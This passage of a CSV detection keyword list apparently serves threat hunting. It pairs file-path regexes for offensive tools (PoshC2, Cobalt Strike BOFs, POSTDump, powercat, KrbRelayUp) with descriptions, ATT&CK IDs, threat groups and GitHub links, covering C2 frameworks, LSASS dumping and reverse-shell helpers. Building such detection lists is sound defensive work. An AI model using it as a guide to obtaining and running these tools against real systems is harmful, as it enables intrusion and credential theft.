APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/port_reuse.py*",".{0,1000}\/port_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/port_scan.py*",".{0,1000}\/port_scan\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PortBender/*",".{0,1000}\/PortBender\/.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*/portscan.cna*",".{0,1000}\/portscan\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/portscan.git*",".{0,1000}\/portscan\.git.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" "*/portscan.yaml*",".{0,1000}\/portscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/portscan/releases/*",".{0,1000}\/portscan\/releases\/.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" "*/port-states.nse*",".{0,1000}\/port\-states\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/POSeidon.profile*",".{0,1000}\/POSeidon\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/posh.key*",".{0,1000}\/posh\.key.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh.tpl*",".{0,1000}\/posh\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/PoshC2*",".{0,1000}\/PoshC2.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/poshc2-*",".{0,1000}\/poshc2\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/PoshC2/*",".{0,1000}\/PoshC2\/.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-config*",".{0,1000}\/posh\-config.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-log*",".{0,1000}\/posh\-log.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-project*",".{0,1000}\/posh\-project.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-server*",".{0,1000}\/posh\-server.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-service*",".{0,1000}\/posh\-service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-stop-service*",".{0,1000}\/posh\-stop\-service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-update*",".{0,1000}\/posh\-update.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/post_exploitation*",".{0,1000}\/post_exploitation.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PostDump.exe*",".{0,1000}\/PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/PostDump.exe*",".{0,1000}\/PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/PostDump.exe*",".{0,1000}\/PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/POSTDump.git*",".{0,1000}\/POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/POSTDump.git*",".{0,1000}\/POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/POSTDump.sln*",".{0,1000}\/POSTDump\.sln.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/postLegit/grkg*",".{0,1000}\/postLegit\/grkg.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/postLegit/qhwl*",".{0,1000}\/postLegit\/qhwl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/PotentiallyCrackableAccounts.ps1*",".{0,1000}\/PotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/PowerBruteLogon*",".{0,1000}\/PowerBruteLogon.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*/powercat.git*",".{0,1000}\/powercat\.git.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*/powercat.ps1",".{0,1000}\/powercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/powercat.ps1*",".{0,1000}\/powercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*/PowerExtract.git*",".{0,1000}\/PowerExtract\.git.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*/PowerExtract.git*",".{0,1000}\/PowerExtract\.git.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*/powerfun.ps1*",".{0,1000}\/powerfun\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/powerglot/*",".{0,1000}\/powerglot\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/powerkatz.dll*",".{0,1000}\/powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*/powerkatz_x64.dll*",".{0,1000}\/powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*/powerkatz_x86.dll*",".{0,1000}\/powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*/powerloader.py*",".{0,1000}\/powerloader\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/Powermad.git*",".{0,1000}\/Powermad\.git.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*/Powermad.ps1*",".{0,1000}\/Powermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*/power-pwn.git*",".{0,1000}\/power\-pwn\.git.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*/PowerSCCM.git*",".{0,1000}\/PowerSCCM\.git.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to 